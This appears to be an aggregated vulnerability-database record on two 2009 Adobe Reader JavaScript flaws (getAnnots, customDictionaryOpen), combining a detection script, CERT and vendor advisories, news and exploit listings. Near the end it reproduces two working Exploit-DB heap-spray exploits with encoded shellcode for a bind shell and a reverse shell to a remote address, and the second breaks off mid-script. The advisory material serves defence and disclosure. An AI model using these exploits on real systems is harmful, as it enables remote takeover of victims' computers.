script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code via\n a crafted document.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version:vers, test_version:\"9.3.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"9.3.2\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:33:43", "bulletinFamily": "info", "description": "### *Detect date*:\n06/09/2009\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious 
vulnerabilities have been found in Adobe Acrobat & Reader. \n\n### *Affected products*:\nAdobe Acrobat & Reader 9 versions 9.1 and earlier \nAdobe Acrobat & Reader 8 versions 8.1.4 and earlier \nAdobe Acrobat & Reader versions 7.1.1 and earlier\n\n### *Solution*:\nUpdate to latest version \n[Reader](<http://get.adobe.com/reader/>)\n\n### *Original advisories*:\n[Adobe bulletin](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Reader](<https://threats.kaspersky.com/en/product/Adobe-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2009-1493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \n[CVE-2009-1492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>)", "modified": "2019-02-13T00:00:00", "published": "2009-06-09T00:00:00", "id": "KLA10033", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10033", "title": "KLA10033 Multiple ACE vulnerabilities in Adobe Acrobat & Reader", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2018-12-25T20:18:22", "bulletinFamily": "info", "description": "### Overview \n\nAdobe Reader and Acrobat contain vulnerabilities in the `customDictionaryOpen()` and `getAnnots()` JavaScript methods.\n\n### Description \n\nAdobe Reader and the Adobe Acrobat family of software is designed to create, view, and edit Portable Document Format (PDF) files. Adobe Reader is widely deployed, and the Acrobat Reader Plug-In displays PDF inside a web browser.\n\nAdobe Reader and Acrobat support JavaScript. The JavaScript methods `customDictionaryOpen()` (CVE-2009-1493) and `getAnnots()` (CVE-2009-1492) do not safely handle specially crafted arguments and can be manipulated to execute arbitrary code. Publicly available exploit code claims to work on Adobe Reader 9.1 and 8.1.4 on GNU/Linux. 
Limited testing shows that Adobe Reader and Acrobat on and Microsoft Windows platforms crash when parsing a PDF file that contains a specially crafted `getAnnots()` call. As of 2009-04-29 we have not confirmed the reported `customDictionaryOpen()` vulnerability. \n \nAdobe Security Advisory [APSA09-02](<http://www.adobe.com/support/security/advisories/apsa09-02.html>) states that the `getAnnots()` vulnerability affects Adobe Reader and Acrobat for Microsoft Windows, Apple Mac OS X, and UNIX, while the `customDictionaryOpen()` vulnerability appears to only affect Adobe Reader for UNIX. \n \n--- \n \n### Impact \n\nBy convincing a user to open a specially crafted PDF file, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Update** \nFrom Adobe Security Bulletin [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>), update to version 9.1.1, 8.1.5, or 7.1.2 of Adobe Reader and Adobe Acrobat Standard, Pro and Pro Extended. \n \n--- \n \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript prevents these vulnerabilities from being exploited and reduces attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo disable JavaScript in Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` check box.\n\nDisabling JavaScript will not resolve the vulnerabilities; it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \nSome vendors ship JavaScript support in a [separate package](<http://packages.medibuntu.org/intrepid/acroread-escript.html>). Removing this package may remove JavaScript support. 
\n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically being opened in a web browser with Adobe Reader: \n\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` check box.\n\n**Rename or remove Annots.api** \n \nTo disable the vulnerable `getAnnots()` method, rename or remove the `Annots.api` file. This will disable some Annotation functionality; however, annotations can still be viewed. This does not protect against the `customDictionaryOpen()` vulnerability. \n \nOn Windows, Annots.api is typically located here: \n \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\plug_ins\"` \n \nExample location on GNU/Linux: \n \n`/opt/Adobe/Reader8/Reader/intellinux/plug_ins/Annots.api` \n \n**Do not access PDF documents from untrusted sources** \n \nDo not open unfamiliar or unexpected PDF documents, particularly those hosted on web sites or delivered as email attachments. Please see Cyber Security Tip [ST04-010](<http://www.us-cert.gov/cas/tips/ST04-010.html>). 
\n--- \n \n### Vendor Information\n\n970180\n\n### Adobe \n\nNotified: April 28, 2009 Updated: May 13, 2009 \n\n### Status\n\nVulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nPlease see Adobe Security Bulletin [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>) and Adobe Security Advisory [APSA09-02](<http://www.adobe.com/support/security/advisories/apsa09-02.html>). See also:\n\n \n<http://blogs.adobe.com/psirt/2009/04/potential_adobe_reader_issue.html> \n<http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html> \n<http://blogs.adobe.com/psirt/2009/05/adobe_reader_issue_update.html>\n\n### Vendor References\n\nNone\n\n### Addendum\n\nThere are no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23970180 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb09-06.html>\n * <http://www.adobe.com/support/security/advisories/apsa09-02.html>\n * <http://blogs.adobe.com/psirt/2009/04/potential_adobe_reader_issue.html>\n * <http://blogs.adobe.com/psirt/2009/04/update_on_adobe_reader_issue.html>\n * <http://blogs.adobe.com/psirt/2009/05/adobe_reader_issue_update.html>\n * <http://www.adobe.com/devnet/acrobat/pdfs/js_api_reference.pdf>\n * <http://www.securityfocus.com/bid/34736/>\n * <http://www.securityfocus.com/bid/34740/>\n\n### Credit\n\nThese vulnerabilities were 
publicly reported by Arr1val. \n\nThis document was written by Art Manion. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-1492](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1492>), [CVE-2009-1493](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1493>) \n---|--- \n**Severity Metric:** | 21.80 \n**Date Public:** | 2009-04-28 \n**Date First Published:** | 2009-04-29 \n**Date Last Updated:** | 2009-09-05 02:06 UTC \n**Document Revision:** | 44 \n", "modified": "2009-09-05T02:06:00", "published": "2009-04-29T00:00:00", "id": "VU:970180", "href": "https://www.kb.cert.org/vuls/id/970180", "type": "cert", "title": "Adobe Reader and Acrobat customDictionaryOpen() and getAnnots() JavaScript vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA09-133B\r\n\r\n\r\nAdobe Reader and Acrobat JavaScript Vulnerabilities\r\n\r\n Original release date: May 13, 2009\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Adobe Reader versions 9.1, 8.1.4, 7.1.1 and earlier\r\n\r\n * Adobe Acrobat Standard, Pro, and Pro Extended versions 9.1,\r\n 8.1.4, 7.1.1 and earlier\r\n\r\n\r\nOverview\r\n\r\n Adobe has released Security Bulletin APSB09-06, which describes\r\n Adobe Reader and Acrobat updates for two JavaScript vulnerabilities\r\n that could allow a remote attacker to execute arbitrary code.\r\n\r\n\r\nI. 
Description\r\n\r\n Adobe Security Bulletin APSB09-06 announces updates for two\r\n JavaScript vulnerabilities that affect Adobe Reader and Acrobat.\r\n \r\n * A vulnerability in the getAnnots() method (CVE-2009-1492)\r\n affects Adobe Reader and Acrobat for Microsoft Windows, Apple\r\n Mac OS X, and UNIX.\r\n\r\n * A vulnerability in the customDictionaryOpen() method\r\n (CVE-2009-1493) appears to only affect Adobe Reader for UNIX.\r\n\r\n Further details are available in Vulnerability Note VU#970180.\r\n\r\n An attacker could exploit these vulnerabilities by convincing a\r\n user to open a specially crafted Adobe Portable Document Format\r\n (PDF) file. Acrobat integrates with popular web browsers, and\r\n visiting a website is usually sufficient to cause Reader or Acrobat\r\n to open a PDF file.\r\n\r\n\r\nII. Impact\r\n\r\n By convincing a victim to open a specially crafted PDF file, a\r\n remote, unauthenticated attacker may be able to execute arbitrary\r\n code.\r\n\r\n\r\nIII. Solution\r\n\r\n Update\r\n \r\n Adobe has released updates to address this issue. Users are\r\n encouraged to read Adobe Security Bulletin APSB09-06 and update\r\n vulnerable versions of Adobe Reader and Acrobat. According to\r\n APSB09-06, these vulnerabilities are addressed in versions 9.1.1,\r\n 8.1.5, and 7.1.2 of Adobe Reader and Acrobat.\r\n\r\n Disable JavaScript in Adobe Reader and Acrobat\r\n\r\n Disabling JavaScript prevents these vulnerabilities from being\r\n exploited and reduces attack surface. If this workaround is\r\n applied to updated versions of the Adobe Reader and Acrobat, it\r\n may protect against future vulnerabilities.\r\n \r\n To disable JavaScript in Adobe Reader:\r\n \r\n 1. Open Adobe Acrobat Reader.\r\n 2. Open the Edit menu.\r\n 3. Choose the Preferences... option.\r\n 4. Choose the JavaScript section.\r\n 5. 
Uncheck the Enable Acrobat JavaScript check box.\r\n\r\n Disabling JavaScript will not resolve the vulnerabilities, it\r\n will only disable the vulnerable JavaScript component. When\r\n JavaScript is disabled, Adobe Reader and Acrobat prompt to\r\n re-enable JavaScript when opening a PDF that contains JavaScript.\r\n \r\n Prevent Internet Explorer from automatically opening PDF documents\r\n\r\n The installer for Adobe Reader and Acrobat configures Internet\r\n Explorer to automatically open PDF files without any user\r\n interaction. This behavior can be reverted to the safer option of\r\n prompting the user by importing the following as a .REG file:\r\n \r\n Windows Registry Editor Version 5.00\r\n\r\n [HKEY_CLASSES_ROOT\AcroExch.Document.7]\r\n "EditFlags"=hex:00,00,00,00\r\n \r\n Disable the display of PDF documents in the web browser\r\n\r\n Preventing PDF documents from opening inside a web browser\r\n reduces attack surface. If this workaround is applied to updated\r\n versions of the Adobe Reader and Acrobat, it may protect against\r\n future vulnerabilities. To prevent PDF documents from\r\n automatically being opened in a web browser with Adobe Reader:\r\n \r\n 1. Open Adobe Acrobat Reader.\r\n 2. Open the Edit menu.\r\n 3. Choose the preferences option.\r\n 4. Choose the Internet section.\r\n 5. Un-check the "Display PDF in browser" check box.\r\n \r\n Rename or remove Annots.api\r\n\r\n To disable the vulnerable getAnnots() method, rename or remove\r\n the Annots.api file. This will disable some Annotation\r\n functionality, however annotations can still be viewed. This does\r\n not protect against the customDictionaryOpen() vulnerability. 
On\r\n Windows, Annots.api is typically located here:\r\n \r\n "%ProgramFiles%\Adobe\Reader 9.0\Reader\plug_ins"\r\n \r\n Example location on GNU/Linux:\r\n \r\n /opt/Adobe/Reader8/Reader/intellinux/plug_ins/Annots.api\r\n \r\n Do not access PDF documents from untrusted sources\r\n\r\n Do not open unfamiliar or unexpected PDF documents, particularly\r\n those hosted on web sites or delivered as email\r\n attachments. Please see Cyber Security Tip ST04-010.\r\n\r\n\r\nIV. References\r\n\r\n * Vulnerability Note VU#970180 -\r\n <http://www.kb.cert.org/vuls/id/970180>\r\n\r\n * Cyber Security Tip ST04-010: Using Caution with Email Attachments -\r\n <http://www.us-cert.gov/cas/tips/ST04-010.html>\r\n\r\n * Adobe Security Bulletin APSB09-06 -\r\n <http://www.adobe.com/support/security/bulletins/apsb09-06.html>\r\n\r\n * CVE-2009-1492 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>\r\n\r\n * CVE-2009-1493 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA09-133B.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. 
Please send\r\n email to <cert@cert.org> with "TA09-133B Feedback VU#970180" in\r\n the subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2009 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\nRevision History\r\n \r\n May 13, 2009: Initial release\r\n", "modified": "2009-05-14T00:00:00", "published": "2009-05-14T00:00:00", "id": "SECURITYVULNS:DOC:21826", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21826", "title": "US-CERT Technical Cyber Security Alert TA09-133B -- Adobe Reader and Acrobat JavaScript Vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:10:05", "bulletinFamily": "info", "description": "Adobe joined the Patch Tuesday barrage late yesterday, dropping fixes for a pair of code execution holes affecting its Adobe Reader and Acrobat products.[ \n](<http://blogs.zdnet.com/security/?p=3229> \"Permanent Link to Exploit posted for brand-new 
Adobe PDF zero-day\" )\n\nThe [critical update](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>) [adobe.com] addresses a publicly known vulnerability that was being exploited with booby-trapped PDF files.\n\nFrom Adobe\u2019s bulletin:\n\nA critical vulnerability has been identified in Adobe Reader 9.1 and Acrobat 9.1 and earlier versions. This vulnerability (CVE-2009-1492) would cause the application to crash and could potentially allow an attacker to take control of the affected system. A second vulnerability has also been reported that appears to affect Adobe Reader for UNIX only (CVE-2009-1493). These issues are remotely exploitable.\n\nAdobe recommends users of Acrobat and Adobe Reader update their product installations to versions 9.1.1, 8.1.5, or 7.1.2 using the instructions above to protect themselves from potential vulnerabilities.\n\nMac users will have to wait a while longer for this fix:\n\nAdobe expects to make available Adobe Reader 7 and Acrobat 7 updates for Macintosh before the end of June.\n\nYesterday was quite a banner day for security patches. 
First, Microsoft dropped a major PowerPoint update to correct 14 documented security flaws and, later in the day, Adobe shipped fixes for a whopping 67 vulnerabilities affecting Mac OS X and Safari.\n\n_* Image [from midiman](<http://www.flickr.com/photos/midiman/>) (CC 2.0) _\n", "modified": "2013-04-17T16:39:13", "published": "2009-05-13T14:36:11", "id": "THREATPOST:FD3B3E8871059FA1B40FE0E09CEBA411", "href": "https://threatpost.com/adobe-joins-patch-tuesday-barrage-051309/72682/", "type": "threatpost", "title": "Adobe joins Patch Tuesday barrage", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 05/29/2009 \nCVE: [CVE-2009-1492](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>) \nBID: [34736](<http://www.securityfocus.com/bid/34736>) \nOSVDB: [54130](<http://www.osvdb.org/54130>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA vulnerability in the Javascript API allows command execution when a user opens a PDF file which calls the `**getAnnots**` method with specially crafted arguments. \n\n### Resolution\n\nApply one of the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 and requires a user to open the exploit file in Adobe Reader. \n\nDue to the nature of the vulnerability, the success of the exploit depends on the state of the target system's memory. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-29T00:00:00", "published": "2009-05-29T00:00:00", "id": "SAINT:CEDD49A8B4DB5911F7462ADDC84F7F1C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_getannots", "type": "saint", "title": "Adobe Reader Javascript API getAnnots method vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 05/29/2009 \nCVE: [CVE-2009-1492](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>) \nBID: [34736](<http://www.securityfocus.com/bid/34736>) \nOSVDB: [54130](<http://www.osvdb.org/54130>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA vulnerability in the Javascript API allows command execution when a user opens a PDF file which calls the `**getAnnots**` method with specially crafted arguments. \n\n### Resolution\n\nApply one of the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 and requires a user to open the exploit file in Adobe Reader. \n\nDue to the nature of the vulnerability, the success of the exploit depends on the state of the target system's memory. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-29T00:00:00", "published": "2009-05-29T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_getannots", "id": "SAINT:FBEE88D561880A37F17CB8475A74DF84", "title": "Adobe Reader Javascript API getAnnots method vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:16", "bulletinFamily": "exploit", "description": "Added: 05/29/2009 \nCVE: [CVE-2009-1492](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1492>) \nBID: [34736](<http://www.securityfocus.com/bid/34736>) \nOSVDB: [54130](<http://www.osvdb.org/54130>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA vulnerability in the Javascript API allows command execution when a user opens a PDF file which calls the `**getAnnots**` method with specially crafted arguments. \n\n### Resolution\n\nApply one of the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 and requires a user to open the exploit file in Adobe Reader. \n\nDue to the nature of the vulnerability, the success of the exploit depends on the state of the target system's memory. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-29T00:00:00", "published": "2009-05-29T00:00:00", "id": "SAINT:FA0AC5B49967884BC44994F190A2AB12", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_getannots", "title": "Adobe Reader Javascript API getAnnots method vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:01", "bulletinFamily": "exploit", "description": "Added: 05/12/2009 \nCVE: [CVE-2009-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \nBID: [34740](<http://www.securityfocus.com/bid/34740>) \nOSVDB: [54129](<http://www.osvdb.org/54129>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in the Javascript API in Adobe Reader allows command execution when a user opens a specially crafted PDF file which calls the `**spell.customDictionaryOpen**` method. \n\n### Resolution\n\nApply the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 on Ubuntu 8.04.1 and Red Hat Enterprise Linux 5 with Exec-Shield enabled. Note that binary files AdbeRdr9.1.0-1_i486linux_enu.bin and AdobeReader_enu-8.1.3-1.i486.tar.gz from the official site of the vendor were used to develop this exploit. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "id": "SAINT:AA296E365F7326125870EB3DED9B1E5C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_customdictionaryopen", "type": "saint", "title": "Adobe Reader Javascript API spell.customDictonaryOpen memory corruption", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-14T16:58:05", "bulletinFamily": "exploit", "description": "Added: 05/12/2009 \nCVE: [CVE-2009-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \nBID: [34740](<http://www.securityfocus.com/bid/34740>) \nOSVDB: [54129](<http://www.osvdb.org/54129>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in the Javascript API in Adobe Reader allows command execution when a user opens a specially crafted PDF file which calls the `**spell.customDictionaryOpen**` method. \n\n### Resolution\n\nApply the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 on Ubuntu 8.04.1 and Red Hat Enterprise Linux 5 with Exec-Shield enabled. Note that binary files AdbeRdr9.1.0-1_i486linux_enu.bin and AdobeReader_enu-8.1.3-1.i486.tar.gz from the official site of the vendor were used to develop this exploit. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_customdictionaryopen", "id": "SAINT:ED952066EAE6F9D664D81C70DB51E326", "type": "saint", "title": "Adobe Reader Javascript API spell.customDictonaryOpen memory corruption", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:08:12", "bulletinFamily": "exploit", "description": "Added: 05/12/2009 \nCVE: [CVE-2009-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \nBID: [34740](<http://www.securityfocus.com/bid/34740>) \nOSVDB: [54129](<http://www.osvdb.org/54129>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in the Javascript API in Adobe Reader allows command execution when a user opens a specially crafted PDF file which calls the `**spell.customDictionaryOpen**` method. \n\n### Resolution\n\nApply the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 on Ubuntu 8.04.1 and Red Hat Enterprise Linux 5 with Exec-Shield enabled. Note that binary files AdbeRdr9.1.0-1_i486linux_enu.bin and AdobeReader_enu-8.1.3-1.i486.tar.gz from the official site of the vendor were used to develop this exploit. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "id": "SAINT:CB62BD8F8850085C977A71C34F2176B3", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_customdictionaryopen", "title": "Adobe Reader Javascript API spell.customDictonaryOpen memory corruption", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:40:10", "bulletinFamily": "exploit", "description": "Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit. CVE-2009-1492. Remote exploit for linux platform", "modified": "2009-04-29T00:00:00", "published": "2009-04-29T00:00:00", "id": "EDB-ID:8569", "href": "https://www.exploit-db.com/exploits/8569/", "type": "exploitdb", "title": "Adobe Reader 8.1.4/9.1 GetAnnots Remote Code Execution Exploit", "sourceData": "//##############\n//Exploit made by Arr1val\n//Proved in adobe 9.1 and adobe 8.1.4 on linux\n//\n//Steps:\n//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)\n//- attach the following script to the OpenAction of the pdf.\n//##############\n\nvar memory;\nfunction New_Script()\n{\n\n//if(adobe9)//adobe reader 8 works also with app.setTimeOut?\nvar startwith = app.alert('Hi');//required for adobe9\n\n var nop = unescape(\"%u9090%u9090\"); //long nop will also force the address to go to 0x90909090 so 2 steps in one ;)\n var shellcode = unescape( \"%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4\"); //linux bind shell at port 4444\n\n while(nop.length <= 0x100000/2) nop+=nop;\n nop=nop.substring(0,0x100000/2 - 
shellcode.length);\n\n memory=new Array();\n for(i=0;i<0x6ff;i++) //we should at least overwrite 0x90909090\n {memory[i]=nop + shellcode;}\n\n//start exploit now\nstart();\n\nfunction start()\n{\n this.getAnnots(-134217728,-134217728,-134217728,-134217728);\n}\n\n}\n\n//############################\n\n# milw0rm.com [2009-04-29]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8569/"}, {"lastseen": "2016-02-01T07:40:18", "bulletinFamily": "exploit", "description": "Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit. CVE-2009-1493. Remote exploit for linux platform", "modified": "2009-04-29T00:00:00", "published": "2009-04-29T00:00:00", "id": "EDB-ID:8570", "href": "https://www.exploit-db.com/exploits/8570/", "type": "exploitdb", "title": "Adobe 8.1.4/9.1 customDictionaryOpen Code Execution Exploit", "sourceData": "//##############\n//Exploit made by Arr1val\n//Proved in adobe 9.1 and adobe 8.1.4 on linux\n//##############\n\nvar memory;\nfunction New_Script()\n{\n\tvar nop = unescape(\"%u9090%u9090\");\nvar shellcode = unescape(\"%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b%u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%ufeb1%u199f%ua442%u88da%ucd2e%ucac4%uc30b%uf896%u15a9%u21a3%uf619%u904c%u680b%u2345%u8a20%u02ea%ucd20%u13ea%ucb21%u924c%uf61a%u904c%uaef8%uf108%ua548\");//443 on 10.1.31.249\n\n\twhile(nop.length <= 0x10000/2) nop+=nop;\n\tnop=nop.substring(0,0x10000/2 - shellcode.length);\n\n\tmemory=new Array();\n\tfor(i=0;i<0x6ff0;i++)\n\t{memory[i]=nop + shellcode;}\n\n//start exploit now\nstart();\n\nfunction start()\n{\n\tthis.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. 
